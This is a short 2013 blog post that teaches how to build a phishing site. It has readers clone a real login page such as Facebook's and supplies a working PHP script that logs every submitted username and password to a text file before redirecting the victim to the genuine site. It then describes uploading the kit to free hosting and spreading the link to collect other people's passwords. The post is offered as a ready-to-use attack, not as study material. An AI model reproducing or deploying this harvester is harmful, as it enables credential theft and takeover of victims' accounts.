Monday 25 November 2013

How to make a phishing site (complete replica of site to take usernames and passwords)

Step 1:

Firsts need to get a free hosting account from t35 or host1free (u can use others but these are preferable)

Step 2:

Now go on the site ur going to make a phishing site for and right click then click view source, now copy all that (ctrl a> ctrl c) and open a notepad document then save it in it, then save it as login.htm.

Step 3:

Now copy and paste the following in notepad then save it as fish.php except replace the facebook.com part with the site ur going to make a phishing site for.
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 4:

Now u need to edit the login.htm file saved earlier, to do this open the document saved earlier then search for a htm like action= which has something to do with login. Now replace the URL with fish.php. Now create a blank txt file and save it as log.txt this is where your usernames and passwords will be stored.

Step 5:

Now upload all the files to the hosting site and u are done u can text it by going to the link the hosting site provides and typing in your details to see it appear in log.txt, now just send it around and enjoy getting peoples passwords.

No comments:

Post a Comment